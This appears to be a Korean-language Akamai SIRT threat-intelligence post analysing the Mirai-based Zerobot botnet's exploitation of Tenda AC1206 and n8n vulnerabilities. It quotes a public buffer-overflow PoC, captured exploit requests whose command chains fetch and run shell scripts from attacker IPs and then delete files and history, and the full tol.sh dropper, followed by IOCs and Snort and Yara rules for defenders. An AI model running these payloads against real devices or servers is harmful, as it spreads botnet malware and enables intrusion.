Zerobot 멀웨어, n8n 자동화 플랫폼 공격

Feb 27, 2026

에 의해 작성

카일 레프톤(Kyle Lefton)은 Akamai 보안 인텔리전스 대응팀의 보안 연구원입니다. 국방부의 인텔리전스 애널리스트였던 카일은 사이버 방어, 위협 리서치, 카운터 인텔리전스 부문에서 다년간 경력을 쌓았습니다. 자신 있는 분야는 새로운 위협 조사, 취약점 리서치, 위협 그룹 매핑 분야입니다. 여가 시간에는 친구, 가족과 함께 시간을 보내고 전략 게임과 아웃도어 하이킹을 즐깁니다.

Akamai 보안 인텔리전스 대응팀(SIRT)은 Tenda AC1206 라우터 및 n8n 자동화 플랫폼에서 명령어 인젝션 취약점 CVE-2025-7544 및 CVE-2025-68613의 실제 악용 활동을 확인했습니다.
SIRT는 2026년 1월에 글로벌 허니팟 네트워크에서 해당 취약점의 활동을 처음 확인했습니다. 각각 2025년 7월과 12월에 공개된 이래 해당 취약점에 대한 첫 실제 악용 사례로 보고되었습니다.
이번 블로그 게시물에는 이 위협에 대한 방어에 도움이 될 수 있는 감염 지표(IOC) 목록이 포함되어 있습니다.

IOC로 건너뛰기

서론

Akamai SIRT는 Tenda AC1206 라우터와 n8n 워크플로 자동화 플랫폼에 영향을 미치는 CVE를 포함해 다양한 최신 CVE를 표적으로 삼는, Zerobot이라는 Mirai 기반 멀웨어 캠페인을 지속적으로 발견했습니다. 이 봇넷 캠페인은 2025년 12월 초로 거슬러 올라가는 데, 최근에 탐지된 악용 사례는 2026년 1월 중순에 글로벌 허니팟 네트워크에서 Mirai 멀웨어의 변종을 확산시키는 것이었습니다.

n8n 취약점을 표적으로 삼았다는 점이 특히 흥미롭습니다. 봇넷은 일반적으로 보안 카메라, DVR, 라우터와 같은 사물 인터넷(IoT) 디바이스를 악용하지만 n8n은 완전히 다른 범주에 속합니다.

이러한 공격이 완전히 새로운 봇넷의 동작은 아니지만, n8n 악용이 공격자의 측면 이동을 지원할 수 있으므로 이러한 종류의 표적 공격으로 인해 기업은 더 중요한 인프라가 감염될 수 있는 더 큰 리스크에 노출됩니다.

표적화되는 취약점

SIRT의 관측 결과에 따르면 Zerobot은 두 가지 취약점을 표적으로 삼고 있습니다. CVE-2025-7544 및 CVE-2025-68613이 사용됩니다. 허니팟에서의 악용 시도에 대한 타임스탬프는 CVE가 공개된 이후였으며, 이는 이러한 취약점이 제로데이가 아니라는 것을 확인해 줍니다.

최근 공개된 취약점을 공격자가 기회주의적으로 악용하는 경우가 요즘 매우 흔합니다. 패치를 발빠르게 적용하는 기업조차도 공개 직후에는 취약한 상태인 시점이 있으며 일부 기업은 해당 디바이스의 패치를 소홀히 합니다.

CVE-2025-7544 세부 정보

2025년 7월 중순에 발표된 CVE-2025-7544는 Tenda AC1206 디바이스 버전 15.03.06.23의 /goform/setMacFilterCfg 엔드포인트에 영향을 미치는 원격 스택 기반 버퍼 오버플로로, 심각한 것으로 평가되었으며 deviceList 매개변수를 통해 악용될 수 있습니다. parse_macfilter_rule 함수 때문에 변수 s(엄밀히 따지면 v3)는 길이 확인 없이 strcpy 함수로 전달되어 스택 기반 버퍼 대상(즉, s_2)을 오버플로할 수 있습니다.

공격자는 페이지 요청을 통해 심지어 원격으로도 서비스 거부(DoS) 공격이나 원격 코드 실행(RCE)을 손쉽게 실행할 수 있습니다. 취약점과 악용 사례를 자세히 분석한 공개 개념 증명(PoC)이 공개되어 있습니다(그림 1).

import requests
ip = "192.168.0.1"
url = "http://" + ip + "/goform/setMacFilterCfg"
data = {
    "macFilterType": "white",
    "deviceList": "a" * 1000 + "\r" + "b" * 1000
}
response = requests.get(url, params=data)
print(response.text)

그림 1: CVE-2025-7544 PoC 악용 사례

CVE-2025-68613 세부 정보

2025년 12월 중순에 발표된 CVE-2025-68613은 n8n 워크플로 자동화 플랫폼의 워크플로 수식 평가 시스템에 영향을 미치는 RCE 취약점으로(버전 0.211.0~1.20.4, 그리고 1.21.1, 1.22.0), 심각도가 높은 것으로 평가되었습니다.

n8n에서는 사용자가 데이터를 동적으로 처리하기 위해 워크플로에서 수식을 작성할 수 있지만, 이러한 식은 적절한 샌드박싱으로 평가되지 않았기 때문에 공격자는 원하는 실행 컨텍스트를 탈취해 서버에서 임의의 코드를 실행할 수 있습니다. 공격자는 기본 시스템에서 이러한 수식을 실행함으로써 서버의 파일을 읽고 쓰고, API 키와 같은 환경 변수를 탈취하고, 지속성을 확보할 수도 있습니다.

이 취약점은 다소 악용하기 쉽고 관리 권한이 없는 사용자 로그인만 있으면 되며 n8n이 접속할 수 있는 모든 데이터에 접속할 수 있습니다. 많은 기업이 데이터베이스를 클라우드 서비스와 통합하고, 데이터 처리를 자동화하고, 민감한 데이터를 관리하고, 다양한 플랫폼과 내부 시스템을 연결하는 등의 다양한 목적으로 n8n을 사용합니다. 이 취약점에 대한 PoC 악용 사례도 공개되어 있습니다.

Tenda 및 n8n의 실제 악용 사례

Akamai SIRT는 2026년 1월 중순부터 글로벌 허니팟 네트워크에서 CVE-2025-7544에 대한 Zerobot의 적극적인 악용 시도를 발견했습니다. 그림 2에서 볼 수 있듯이, 해당 악용 시도를 통해 deviceList 매개변수에 500개의 "A" 문자를 사용해 버퍼 오버플로를 트리거하고, 임의 코드를 실행할 수 있습니다. 그런 다음 이 악용 사례에서는 미국 기반 IP 주소 144.172.100.228에서 tol.sh라는 악성 셸 스크립트를 다운로드하고 실행합니다.

/goform/setMacFilterCfg

macFilterType=black&deviceList=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAcd /tmp || cd /var/run || cd /mnt || cd /root || cd /; chmod 777 /sbin/wget /usr/sbin/wget /bin/wget /usr/bin/wget /sbin/curl /usr/sbin/curl /bin/curl /usr/bin/curl; wget http://144.172.100[.]228/tol.sh; curl -O http://144.172.100[.]228/tol.sh; chmod 777 tol.sh; sh tol.sh; tftp 140.233.190.96 -c get tol.sh; chmod 777 tol.sh; sh tol.sh; tftp -r 3.sh -g 140.233.190.96; chmod 777 3.sh; sh 3.sh; ftpget -v -u anonymous -p anonymous -P 21 140.233.190.96 2.sh 2.sh; sh 2.sh; rm -rf tol.sh tol.sh 3.sh 2.sh; rm -rf *; history -c

그림 2: CVE-2025-7544의 실제 악용 시도 예시

SIRT는 최근 n8n 취약점 중 하나인 CVE-2025-68613(그림 3)을 악용하려는 Zerobot도 관측했습니다. 그 작동은 다른 악용 시도와 대부분 동일합니다. 즉, tol.sh 셸 스크립트를 다운로드하고 실행해 zerobotv9의 주요 Mirai 멀웨어 페이로드를 가져오고 로드합니다.

/rest/workflow/run

{"workflowData":{"nodes":[{"parameters":{"command":"cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; chmod 777 /sbin/wget /usr/sbin/wget /bin/wget /usr/bin/wget /sbin/curl /usr/sbin/curl /bin/curl /usr/bin/curl; wget http://144.172.100[.]228/tol.sh; curl -O http://144.172.100[.]228/tol.sh; chmod 777 tol.sh; sh tol.sh; tftp 140.233.190.96 -c get tol.sh; chmod 777 tol.sh; sh tol.sh; tftp -r 3.sh -g 140.233.190.96; chmod 777 3.sh; sh 3.sh; ftpget -v -u anonymous -p anonymous -P 21 140.233.190.96 2.sh 2.sh; sh 2.sh; rm -rf tol.sh tol.sh 3.sh 2.sh; rm -rf *; history -c"},"name":"Exec","type":"n8n-nodes-base.executeCommand","typeVersion":1,"position":[100,100]}],"connections":{}}}

그림 3: CVE-2025-68613의 실제 악용 시도 예시

Mirai 기반 봇넷이 n8n을 표적으로 삼은 것은 전례 없는 일이 아니지만, 일반적인 IoT 디바이스 악용과는 뚜렷한 차이가 있습니다. 봇넷이 기업의 핵심 인프라에서 접속 권한과 지속성을 확보하고 측면 이동을 사용할 가능성이 있다는 점은 분명 우려의 대상이 될 수 있습니다.

Zeronet 봇넷

그림 4의 셸 스크립트는 Mirai 다운로더들에게 흔한 여러 가지 아키텍처를 지원하는 주요 Mirai 기반 멀웨어 페이로드인 zerobotv9를 가져와 실행합니다. UPX로 패킹된 페이로드에는 0bot.qzz[.]io의 하드 코딩된 명령 및 제어 도메인과 일반적인 Mirai 멀웨어 콘솔 실행 문자열(이 경우 "bruh why again")을 비롯한 여러 가지 암호화된 문자열과 매개변수가 있습니다.

Zerobot의 이 명칭은 2022년도 Fortinet 기사로 거슬러 올라가지만, 그 이름에 해당 공격자가 관련되어 있는지는 알려지지 않았습니다. 명명법상 zerobotv9는 Zerobot 멀웨어의 9번째 버전임을 나타내지만 나머지 8개 버전은 발견되지 않았습니다.

2022년도에 처음으로 발견된 것 외에도, 2025년 8월에 zerobotv2라는 공개 멀웨어 샘플이 발견되었지만, 이는 일반적으로 사용되는 LZRD Mirai 멀웨어 변종인 것으로 보입니다.

#!/bin/bash

ulimit -n 1024
cp /bin/busybox /tmp/
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; chmod +x /sbin/wget /usr/sbin/wget /bin/wget /usr/bin/wget /sbin/curl /usr/sbin/curl /bin/curl /usr/bin/curl; wget http://144.172.100[.]228/mamakmukekkontol/zerobotv9.x86; curl -O http://144.172.100[.]228/mamakmukekkontol/zerobotv9.x86; chmod +x *; ./zerobotv9.x86 zerobotv9.x86; rm -rf zerobotv9.x86
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; chmod +x /sbin/wget /usr/sbin/wget /bin/wget /usr/bin/wget /sbin/curl /usr/sbin/curl /bin/curl /usr/bin/curl; wget http://144.172.100[.]228/mamakmukekkontol/zerobotv9.mips; curl -O http://144.172.100[.]228/mamakmukekkontol/zerobotv9.mips; chmod +x *; ./zerobotv9.mips zerobotv9.mips; rm -rf zerobotv9.mips
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; chmod +x /sbin/wget /usr/sbin/wget /bin/wget /usr/bin/wget /sbin/curl /usr/sbin/curl /bin/curl /usr/bin/curl; wget http://144.172.100[.]228/mamakmukekkontol/zerobotv9.arc; curl -O http://144.172.100[.]228/mamakmukekkontol/zerobotv9.arc; chmod +x *; ./zerobotv9.arc zerobotv9.arc; rm -rf zerobotv9.arc
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; chmod +x /sbin/wget /usr/sbin/wget /bin/wget /usr/bin/wget /sbin/curl /usr/sbin/curl /bin/curl /usr/bin/curl; wget http://144.172.100[.]228/mamakmukekkontol/zerobotv9.i686; curl -O http://144.172.100[.]228/mamakmukekkontol/zerobotv9.i686; chmod +x *; ./zerobotv9.i686 zerobotv9.i686; rm -rf zerobotv9.i686
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; chmod +x /sbin/wget /usr/sbin/wget /bin/wget /usr/bin/wget /sbin/curl /usr/sbin/curl /bin/curl /usr/bin/curl; wget http://144.172.100[.]228/mamakmukekkontol/zerobotv9.x86_64; curl -O http://144.172.100[.]228/mamakmukekkontol/zerobotv9.x86_64; chmod +x *; ./zerobotv9.x86_64 zerobotv9.x86_64; rm -rf zerobotv9.x86_64
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; chmod +x /sbin/wget /usr/sbin/wget /bin/wget /usr/bin/wget /sbin/curl /usr/sbin/curl /bin/curl /usr/bin/curl; wget http://144.172.100[.]228/mamakmukekkontol/zerobotv9.mpsl; curl -O http://144.172.100[.]228/mamakmukekkontol/zerobotv9.mpsl; chmod +x *; ./zerobotv9.mpsl zerobotv9.mpsl; rm -rf zerobotv9.mpsl
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; chmod +x /sbin/wget /usr/sbin/wget /bin/wget /usr/bin/wget /sbin/curl /usr/sbin/curl /bin/curl /usr/bin/curl; wget http://144.172.100[.]228/mamakmukekkontol/zerobotv9.arm; curl -O http://144.172.100[.]228/mamakmukekkontol/zerobotv9.arm; chmod +x *; ./zerobotv9.arm zerobotv9.arm; rm -rf zerobotv9.arm
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; chmod +x /sbin/wget /usr/sbin/wget /bin/wget /usr/bin/wget /sbin/curl /usr/sbin/curl /bin/curl /usr/bin/curl; wget http://144.172.100[.]228/mamakmukekkontol/zerobotv9.arm5; curl -O http://144.172.100[.]228/mamakmukekkontol/zerobotv9.arm5; chmod +x *; ./zerobotv9.arm5 zerobotv9.arm5; rm -rf zerobotv9.arm5
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; chmod +x /sbin/wget /usr/sbin/wget /bin/wget /usr/bin/wget /sbin/curl /usr/sbin/curl /bin/curl /usr/bin/curl; wget http://144.172.100[.]228/mamakmukekkontol/zerobotv9.arm6; curl -O http://144.172.100[.]228/mamakmukekkontol/zerobotv9.arm6; chmod +x *; ./zerobotv9.arm6 zerobotv9.arm6; rm -rf zerobotv9.arm6
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; chmod +x /sbin/wget /usr/sbin/wget /bin/wget /usr/bin/wget /sbin/curl /usr/sbin/curl /bin/curl /usr/bin/curl; wget http://144.172.100[.]228/mamakmukekkontol/zerobotv9.arm7; curl -O http://144.172.100[.]228/mamakmukekkontol/zerobotv9.arm7; chmod +x *; ./zerobotv9.arm7 zerobotv9.arm7; rm -rf zerobotv9.arm7
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; chmod +x /sbin/wget /usr/sbin/wget /bin/wget /usr/bin/wget /sbin/curl /usr/sbin/curl /bin/curl /usr/bin/curl; wget http://144.172.100[.]228/mamakmukekkontol/zerobotv9.ppc; curl -O http://144.172.100[.]228/mamakmukekkontol/zerobotv9.ppc; chmod +x *; ./zerobotv9.ppc zerobotv9.ppc; rm -rf zerobotv9.ppc
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; chmod +x /sbin/wget /usr/sbin/wget /bin/wget /usr/bin/wget /sbin/curl /usr/sbin/curl /bin/curl /usr/bin/curl; wget http://144.172.100[.]228/mamakmukekkontol/zerobotv9.spc; curl -O http://144.172.100[.]228/mamakmukekkontol/zerobotv9.spc; chmod +x *; ./zerobotv9.spc zerobotv9.spc; rm -rf zerobotv9.spc
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; chmod +x /sbin/wget /usr/sbin/wget /bin/wget /usr/bin/wget /sbin/curl /usr/sbin/curl /bin/curl /usr/bin/curl; wget http://144.172.100[.]228/mamakmukekkontol/zerobotv9.m68k; curl -O http://144.172.100[.]228/mamakmukekkontol/zerobotv9.m68k; chmod +x *; ./zerobotv9.m68k zerobotv9.m68k; rm -rf zerobotv9.m68k
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; chmod +x /sbin/wget /usr/sbin/wget /bin/wget /usr/bin/wget /sbin/curl /usr/sbin/curl /bin/curl /usr/bin/curl; wget http://144.172.100[.]228/mamakmukekkontol/zerobotv9.sh4; curl -O http://144.172.100[.]228/mamakmukekkontol/zerobotv9.sh4; chmod +x *; ./zerobotv9.sh4 zerobotv9.sh4; rm -rf zerobotv9.sh4

그림 4: tol.sh의 내용

기존의 2022년 Zerobot 멀웨어와 새로운 Zerobotv9 샘플 사이에는 다양한 차이가 있습니다. 가장 주목할 만한 차이점은 원본은 파일 크기 면에서 훨씬 크고 Go로 작성되었지만, Zerobotv9는 크기가 작고 Go로 작성되지 않았다는 것입니다.

그러나 2022년 10월에는 기존 다운로더 IP 주소에서 Zerobot이라는 이름을 가지고 있지만 Go로 작성되지는 않은 샘플이 발견되었습니다. 이 2022년 10월 변종과 Zerobotv9는 모두 0XDEADBEEF 또는 0x22의 기존 Mirai 멀웨어 XOR 키를 그대로 사용합니다.

이 최신 버전에는 TCPXmas, Mixamp, SSH, Discord라는 공격 메서드 등, 이전 버전에는 없었던 다양한 공격 함수도 있습니다. 하드 코딩된 사용자 에이전트는 그림 5에 나와 있습니다.

Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/4.0; GTB7.4; Info Path.3; SV1; .NET CLR 3.4.53360; WOW64; en-US)
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/4.0; FDM; MSIECrawler; Media Center PC 5.0)
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 4.4.58799; WOW64; en-US)
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; FunWebProducts)
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:25.0) Gecko/20100101 Firefox/25.0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:25.0) Gecko/20100101 Firefox/25.0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:21.0) Gecko/20100101 Firefox/21.0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:24.0) Gecko/20100101 Firefox/24.0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko/20100101 Firefox/33.0
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94

그림 5: 해독된 Zerobotv9 멀웨어의 하드 코딩된 사용자 에이전트

기타 악용 사례

이 블로그 게시물에서는 Tenda 디바이스와 n8n 플랫폼의 실제 악용을 중점적으로 다루고 있지만, SIRT는 Zerobot이 CVE-2017-9841(그림 6), CVE-2021-3129(그림 7), CVE-2022-22947(그림 8) 등의 다른 여러 취약점을 표적으로 삼는 것도 관측했습니다.

이러한 시도에서는 netcat 및 socat을 사용해 원시 TCP 연결을 열고 소켓에서 stdout으로 데이터를 읽은 다음, 주요 Mirai 멀웨어 페이로드에 로드하기 위한 스크립트를 실행하는 명령어를 사용하고 있으므로, 중점적으로 다루고 있는 악용 시도와는 약간 다릅니다.

공격자는 n8n 및 Tenda 취약점에도 이 방법을 사용했으며, Perl 소켓, Bash TCP 리디렉션, PHP 소켓, Python 소켓과 같은 다양한 대체 공격 수단을 갖추고 있었습니다. 이 기법은 2025년 12월 초에 처음 사용된 이후로 2026년 1월에는 curl 및 wget과 같은 툴로 전환되었습니다.

결론

Mirai 기반 봇넷을 구축하면 진입 장벽을 상당히 낮출 수 있어 최근 사법 기관의 대규모 소탕 작전에도 불구하고 Mirai의 확산은 계속되고 있습니다. 쉽게 돈을 벌거나 단순히 스릴을 느끼기 위한 목적으로 비교적 경험이 부족한 공격자도 기존 Mirai 코드를 약간 수정해 재사용하거나 AI 툴을 사용해 렌디션(iterations)할 수 있습니다.

최근 공개된 CVE나 일부 기업이 업그레이드를 소홀히 하는 오래된 하드웨어를 표적으로 삼으면 매우 효과적이므로 제로데이 악용을 위한 연구 및 개발도 필요하지 않습니다. 이러한 방법은 Aisuru와 같이 악명 높은 대규모 봇넷으로 이어지지는 않을 수 있지만, 이를 통해 운영자는 약간의 수익을 창출할 수 있고, 발각되지 않고 공격하기 더 용이할 수 있습니다.

공개의 순 기능

앞서 보고한 바와 같이, CVE 프로그램은 공격자가 탐지하지 못했을 수 있는 취약점을 조명한다는 점에서 양날의 검으로 작용할 수도 있습니다. Akamai에서는 이 프로그램이 여전히 업계에 순 기능으로 작용한다고 판단하지만, 일반적으로 공격자가 이러한 공개 정보를 모니터링해 기업이 효과적으로 패치를 적용하기 전에 이를 악용할 기회를 노리고 있다는 점을 고려해야 합니다.

Zerobot이 악용한 Tenda와 n8n 취약점 모두, 공개된 PoC 악용 사례를 사용할 수 있었기 때문에 실제 악용의 용이성과 확산성을 크게 높일 수 있습니다. 특히 n8n이 기업의 더 중요한 워크플로에 사용되는 경우도 있다는 점을 고려할 때, 잠재적으로 영향을 받는 기업은 가능한 한 빨리 시스템을 보호하고 패치를 적용해 이러한 악용 또는 기타 악의적인 활동으로부터 보호하는 것이 좋습니다.

Akamai와 항상 함께하세요

Akamai SIRT는 고객사와 보안 커뮤니티 전반을 위해 이와 같은 위협을 지속적으로 모니터링하고 보고할 것입니다. SIRT 및 Akamai Security Intelligence Group의 다른 최신 발표를 받으려면 리서치 홈페이지를 방문하고 소셜 미디어를 팔로우하세요.

IOC

보안팀을 돕기 위해 IOC 목록과 Snort 및 Yara 룰을 포함시켰습니다.

악성 IP에 대한 Snort 룰

alert ip any any -> [140.233.190.96, 144.172.100.228, 172.86.123.179, 216.126.227.101, 103.59.160.237] any (
    msg:"Possible Botnet Infrastructure Activity - Suspicious IP"; 
    sid:2000003; 
    rev:1; 
    threshold:type limit, track by_src, count 1, seconds 600; 
    classtype:trojan-activity; 
    metadata:service http, malware;
)

C2 도메인 확인 탐지에 대한 Snort 룰

alert http any any -> [0bot.qzz.io, andro.notemacro.com, pivot.notemacro.com] any (
    msg:"Possible Botnet C2 or Malware Distribution - Suspicious Domain"; 
    sid:2000002; rev:1; 
    classtype:trojan-activity; 
    metadata:service http, malware;
)

멀웨어 샘플에 대한 Yara 룰

rule Mirai_Malware_IOCs_1
{
    meta:
        description = "Detects files containing IOCs associated with potential Mirai malware"
        author = "Akamai SIRT"
        date = "2026-01-29"
        source = "Akamai SIRT"
        malware_family = "Mirai"
        version = "1.0"

    strings:
        $bruh = "bruh why again"
        $url1 = "mamakmukekkontol"
        $url2 = "inihiddenngentod"

        $ip1 = "140.233.190.96"
        $ip2 = "144.172.100.228"
        $ip3 = "172.86.123.179"
        $ip4 = "216.126.227.101"
        $ip5 = "103.59.160.237"

        $domain1 = "0bot.qzz.io"
        $domain2 = "andro.notemacro.com"
        $domain3 = “pivot.notemacro.com”

        $hash1 = "c8e8b627398ece071a3a148d6f38e46763dc534f9bfd967ebc8ac3479540111f"
        $hash2 = "360467c3b733513c922b90d0e222067509df6481636926fa1786d0273169f4da"
        $hash3 = "cc1efbca0da739b7784d833e56a22063ec4719cd095b16e3e10f77efd4277e24"
        $hash4 = "045a1e42cb64e4aa91601f65a80ec5bd040ea4024c6d3b051cb1a6aa15d03b57"
        $hash5 = "d024039824db6fe535ddd51bc81099c946871e4e280c48ed6e90dada79ccfcc7"
        $hash6 = "deb70af83a9b3bb8f9424b709c3f6342d0c63aa10e7f8df43dd7a457bda8f060"
        $hash7 = "6e4e797262c80b9117aded5d25ff2752cd83abe631096b66e120cc3599a82e4e"
        $hash8 = "2fdb2a092f71e4eba2a114364dc8044a7aa7f78b32658735c5375bf1e4e8ece3"
        $hash9 = "263a363e2483bf9fd9f915527f5b5255daa42bbfa1e606403169575d6555a58c"
        $hash10 = "d7112dd3220ccb0b3e757b006acf9b92af466a285bbb0674258bcc9ad463f616"

    condition:
        (
            $url1 or
            $url2 or
            $ip1 or
            $ip2 or
            $ip3 or
            $ip4 or
            $ip5 or
            $domain1 or
            $domain2 or
            $domain3 or
            $hash1 or
            $hash2 or
            $hash3 or
            $hash4 or
            $hash5 or
            $hash6 or
            $hash7 or
            $hash8 or
            $hash9 or
            $hash10
        )
}